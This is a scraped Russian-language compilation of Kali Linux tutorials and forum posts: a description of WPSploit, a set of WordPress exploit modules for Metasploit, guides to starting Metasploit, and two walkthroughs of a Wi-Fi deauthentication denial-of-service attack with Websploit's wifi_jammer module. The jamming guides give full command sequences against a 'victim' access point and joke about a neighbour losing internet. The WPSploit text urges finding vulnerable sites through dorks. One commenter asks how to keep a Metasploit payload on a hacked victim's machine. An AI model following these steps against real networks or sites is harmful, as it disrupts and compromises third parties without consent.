- Инструменты Kali Linux
- Список инструментов для тестирования на проникновение и их описание
- WPSploit
- Описание WPSploit
- Справка по WPSploit
- Руководство по WPSploit
- Примеры запуска WPSploit
- Установка WPSploit
- Установка в Kali Linux
- Скриншоты WPSploit
- Инструкции по WPSploit
- Статья Как запустить Metasploit Framework в Kali Linux
- Pirnazar
- The Codeby
- /dev/null
- 🐉 Как запустить Metasploit Framework в Kali Linux 2020.x
- Как запустить Metasploit Framework на Kali Linux?
- Службы Metasploit Framework
- Требования к Metasploit Framework
- Запустк Metasploit Framework на Kali Linux 2020.x
- Шаг 1: Запустим сервер базы данных PostgreSQL
- Шаг 2. Инициализация базы данных Metasploit PostgreSQL в Kali Linux
- Шаг 3: Запустите msfconsole на Kali Linux
- Компьютерный форум
- WEBSPLOIT -глушим wifi
- WEBSPLOIT -глушим wifi
Инструменты Kali Linux
Список инструментов для тестирования на проникновение и их описание
WPSploit
Описание WPSploit
WPSploit — это дополнительные модули для эксплуатации уязвимостей WordPress с помощью Metasploit.
Назначение этого репозитория — создание и/или портирование эксплойтов под WordPress, в качестве инструмента эксплуатации используется привычный многим Metasploit.
На данный момент имеется 39 модулей (14 эксплойтов и 25 вспомогательных, которые, как правило, проводят разнообразные сканирования/анализ имеющихся уязвимостей).
Все модули созданы с использованием информации базы данных уязвимостей WPScan. Нужно понимать, что главное отличие этих модулей от названной базы данных в том, что это не просто описания уязвимостей, а готовый эксплойты. Вам только нужно найти уязвимые сайты (по доркам или по собственным базам).
Справка по WPSploit
Документация по всем модулям расположена по этому адресу: https://github.com/espreto/wpsploit/tree/master/documentation. Обратите внимание на неё, поскольку в ней даны подробные описания каждого модуля, включающие имеющиеся уязвимости (полезно для поиска уязвимых сайтов), даны примеры использования.
Руководство по WPSploit
Страница man отсутствует.
Примеры запуска WPSploit
Эксплойты из WPSploit можно использовать с помощью Metasploit. Т.е. нам нужно запустить Metasploit. Делается это так:
Далее показан пример работы с одним из эксплойтов:
Установка WPSploit
Установка в Kali Linux
Подразумевается, что Metasploit у вас уже установлен. Далее делаете так:
Информация об установке в другие операционные системы будет добавлена позже.
Скриншоты WPSploit
Это утилита командной строки.
Инструкции по WPSploit
Ссылки на инструкции будут добавлены позже.
Источник
Статья Как запустить Metasploit Framework в Kali Linux
Для запуска Metasploit Framework в Kali 2.0 смотрите здесь.
Чтобы соответствовать Политике Сетевых Служб (Network Services Policy) Kali Linux, при загрузке отсутствуют сетевые службы, включая службы базы данных, поэтому нужно сделать пару шагов чтобы запустить Metasploit с поддержкой базы данных.
Запускаем службу Kali PostgreSQL
Metasploit использует PostgreSQL как его базу данных, следовательно сначала её нужно запустить.
Pirnazar
The Codeby
ООО Кодебай
BEEF
25.06.2015 в 03:01
Спасибо так и сделаю,так как в бектреке службы были всегда запущены,почему в кали они сделали по другому,не знаешь?еще можешь допилить скин как можно через гуй это все запустить гораздо быстрее по моему
WEBWARE TEAM
25.06.2015 в 06:30
Это слишком простая задача, чтобы писать для неё отдельный ГУЙ. Можно просто собрать всё это в одну команду:
service postgresql start && service metasploit start && update-rc.d postgresql enable && update-rc.d metasploit enable
(эту команду нужно вводить один раз, т.к. теперь после каждой перезагрузки службы будут запускаться отдельно)
service postgresql start && service metasploit start && msfconsole
(эта команда запустить необходимые службы на один раз, а также сам Metasploit).
Можно эти строчки сохранить в файл и запускать этот файл двойным кликом:
echo -e ‘#! /bin/bashnservice postgresql start && service metasploit startnmsfconsole’ > Desktop/StartMetasploit.sh && chmod +x Desktop/StartMetasploit.sh
(после выполнения этой команды на рабочем столе создастся файл, при двойном клике на который будет запускаться Metasploit).
но ГУЙ здесь точно не нужен.
LEO
11.07.2015 в 19:38
а подскажите есть какие нибудь эксплоиты под семерку чтоб удоленно можно было взлом произвести как примеру под xp такие есть,что то наподобии такого ms03_026_dcom .
# service metasploit start
Failed to start metasploit.service: Unit metasploit.service failed to load: No such file or directory.
ТАРИК
23.04.2016 в 23:12
та же проблемка
SHA9
01.05.2016 в 17:08
решение
#/etc/init.d/postgresql
service –status-all
service postgresql start
service postgresql status
#/usr/bin/msfconsole
msfdb init
msfconsole
msf > db_status
KURT135
23.01.2016 в 02:50
Народ вот подскажите мне как новичку… Взломал я комп ,вроде все хорошо , но возник другой вопрос . Как сделать так, чтобы фал (exe) созданный в metasploit установился в систему жертвы ,чтобы можно было в любо момент подключиться к данной машине (жертвы) ?
NKSHUM
21.03.2016 в 15:58
При вводе команды show options нет ни одного эксплойта. Командой mfsupdate обновить базу метасплойта не получается выдает следующее : Attempting for update Metasploit Framework .
Cheking for update via the APT repository
Note: expect weekly (ish) updates using this method
No update available
Подскажите что делать?
SHA9
01.05.2016 в 16:45
Failed to start metasploit.service: Unit metasploit.service failed to load: No such file or directory.
проблема та-же,а решения пока никто не написал
Источник
/dev/null
При помощи Kali Linux проще простого реализовать DoS-атаку на закрытую Wi-Fi точку. Есть множество утилит для этого. В нашем случае мы будем использовать утилиту Websploit.
В первую очередь необходимо убедиться, что наш Wi-Fi адаптер распознает система. Для этого введем команду iwconfig . В моём случае адаптер называется wlan0.
Переведем интерфейс в режим монитора для дальнейшей работы с ним — airmon-ng start wlan0 . После, выберем жертву — посмотрим какие точки доступа есть поблизости ( airodum-ng wlan0mon )
В качестве жертвы возьмем ТД «Backdoor». Оставьте окно терминала отрытым или сделайте скриншот — в дальнейшем нам понадобятся данные bssid, essid и channel.
Установим утилиту для взлома — apt-get install websploit . Запустим программу командой websploit.
У данной утилиты множество модулей. Для того, чтобы посмотреть перечень модулей введите show modules . Нас интересует раздел «Wireless / Bluetooth Modules» с модулем wifi_jammer.
Запустим этот модуль командой use wifi/wifi_jammer .
Для реализации DoS-атаки нам понадобятся такие данные о WiFi-точке как: essid(название ТД), bssid (MAC-адрес ТД), channel (канал). Всё это мы уже узнали в самом начале статьи при помощи airodump-ng. Осталось только ввести эти данные.
После команды run началась Dos-атака. Суть атаки заключается в непрерывной отправке пакетов деаутентификации.
Для того, чтобы 100%-но убедиться, что DoS-атака работает введите команду a irodump-ng wlan0mon .
Нас интересует значение PWR, которое равно нулю. Это значит, что DoS-атака работает и клиенты, которые используют заддосенную WiFi-точку никак не смогут подключиться к ней. Для остановки атаки введите stop .
Источник
🐉 Как запустить Metasploit Framework в Kali Linux 2020.x
Как запустить Metasploit Framework на Kali Linux?
Службы Metasploit Framework
- Сервер базы данных PostgreSQL – используется Metasploit для хранения данных из проекта.
- Ruby on Rails
- Metasploit
Требования к Metasploit Framework
Это минимальные требования к оборудованию для запуска Metasploit Framework на любом компьютере с Linux.
- CPU – 2 ГГц + процессор
- ОЗУ – 4 ГБ (рекомендуется 8 ГБ)
- Дисковое пространство – 1 ГБ свободного места на диске (рекомендуется 50 ГБ)
Запустк Metasploit Framework на Kali Linux 2020.x
Ниже будут показаны шаги, которые необходимо предпринять для запуска и запуска Metasploit с поддержкой баз данных в Kali Linux.
Шаг 1: Запустим сервер базы данных PostgreSQL
База данных PostgreSQL установлена, но не запущена в Kali Linux.
Запустите эту службу, используя следующую команду.
Шаг 2. Инициализация базы данных Metasploit PostgreSQL в Kali Linux
После запуска сервера базы данных PostgreSQL приступите к инициализации базы данных Metasploit PostgreSQL.
Эта команда создаст и инициализирует базу данных msf.
Шаг 3: Запустите msfconsole на Kali Linux
Теперь у нас есть служба PostgreSQL, и база данных инициализирована.
Последний необходимый шаг – запустить msfconsole и проверить подключение к базе данных с помощью команды db_status:
$ sudo msfconsole `:oDFo:` ./ymM0dayMmy/. -+dHJ5aGFyZGVyIQ==+- `:sm⏣
Ndo:` ./etc/shadow.0days-Data’%20OR%201=1—.No.0MN8’/. -++SecKCoin++e.AMd` `.-://///+hbove.913.ElsMNh+- —
/.ssh/id_rsa.Des- `htN01UserWroteMe!- :dopeAW.No o :is:TЯiKC.sudo-.A: :we’re.all.alike’` The.PFYroy.No.D7: :PLACEDRINKHERE!: yxp_cmdshell.Ab0: :msf>exploit -j. :Ns.BOB&ALICEes7: :—srwxrwx:-.` `MS146.52.No.Per: :
- Аудит ИБ (44)
- Вакансии (10)
- Закрытие уязвимостей (98)
- Книги (27)
- Мануал (1 937)
- Медиа (66)
- Мероприятия (38)
- Мошенники (22)
- Обзоры (724)
- Обход запретов (33)
- Опросы (3)
- Скрипты (106)
- Статьи (292)
- Философия (77)
- Юмор (17)
Anything in here will be replaced on browsers that support the canvas element
Источник
Компьютерный форум
Здесь решают различные задачи сообща. Присоединяйтесь!
WEBSPLOIT -глушим wifi
Модератор: phantom
WEBSPLOIT -глушим wifi
Сообщение phantom » 13 сен 2016, 19:48
WEBSPLOIT
программный комплекс, включающий в себя множество инструментов для атак на вэб ресурсы, беспроводные сети.
предустановлен в parro os, kali linux
устанавливаем в ubuntu командами от рут.
для начала скачиваем актуальную версию со страницы — https://sourceforge.net/projects/webspl . p_redirect
распаковываем в домашнюю дирректорию, после чего открываем папку и запускаем в ней терминал ( для убунту заходим в распакованную папку, правая кнопка мыши и далее открыть в терминале) пишем команду-
дальше запускаем программу просто в консоли
Отправлено спустя 21 минуту 11 секунд:
дальше есть некоторые сложности в использовании модулей программы, которые мы сейчас с вами исправим, дабы они нормально функционировали. небольшое предисловие, дело в том, что раньше вайфай модули переведенные в режим монитора назывались mon0 но с усовершенствованиями и нововведениями мы имеем девайс в режиме монитора как wlan0mon но разработчики вэбсплоит этот момент по видимому упустили и перевести стандартными средствами просраммы интерфей в режим не получится. делаем следующее- идем по пути /usr/share/websploit/modules/wifi_jammer.py
убеждаемся в наличии файла и открываем его в редакторе от имени рута-
$ sudo gedit /usr/share/websploit/modules/wifi_jammer.py
после чего файл откроется для редактирования, ищем следующие строки в тексте-
elif com[0:7] ==’set mon’:
options[3] = com[8:12]
меняем значение options[3] = com[8:12]
на options[3] = com[8:]
сохраняем файл, перезапускаем websploit
получаем следующее окно-
Отправлено спустя 15 минут 54 секунды:
поскольку сегодня мы разбираем именно модуль, позволяющий заглушить необходимую нам сеть вайфай, посредствам посыла множественных запросов на подключение клиентов, в результате чего точка доступа падает, то использовать мы будем модуль wifi_jammer
соответственно в строке вэбсплоит прописываем следующую команду
show modules которая покажет нам все доступные модули для использования. находим раздел wifi и снова пишем
теперь открываем новый терминал и колдуем с нашей вайфай картой (если у вас убунту, то перед эти установите необходимое по с помощью команды — sudo apt-get install wifite ) продолжим
$ sudo airmon-ng check kill
$ sudo airmon-ng start wlan0 -здесь вы указываете именно свою карту это может быть wlan1 wlan2 и .т.д
далее запускаем сканирование сетей командой
$ sudo airodump-ng wlan0mon
Отправлено спустя 15 минут 1 секунду:
теперь перед нами открывается картина с данными обнаруженных сетей. с указанием необходимых нам данных, нам необходимо знать три позиции целевой сети, а именно ESSID BSSID и CHANNEL
запоминаем либо копируем все это и возвращаемся в консоль websploit
> show options откроется список ввода параметров
> set BSSID (вводим BSSID нашей цели)
> set ESSID (вводим ESSID нашей цели)
> set channel (указываем канал жертвы)
> set mon wlan0mon
> set interface wlan0
> show options убеждаемся, что все параметры заданы и вводим команду на запуск
>run прочитав про себя «Отче наш» жмем ENTER и слышим вопли соседа по поводу пропавшего интернета.
на экране появятся дополнительные терминальные окна с бегущей информацией, падением уровня сигнала сети и т.д.
ВНИМАНИЕ. ВСЯ ИНФОРМАЦИЯ НЕ ЯВЛЯЕТСЯ ПРИЗЫВОМ К ДЕЙСТВИЮ ПРОТИВОЗАКОННОГО ХАРАКТЕРА А ЯВЛЯЕТСЯ ОБЗОРОМ ИНСТРУМЕНТОВ LINUX!
Источник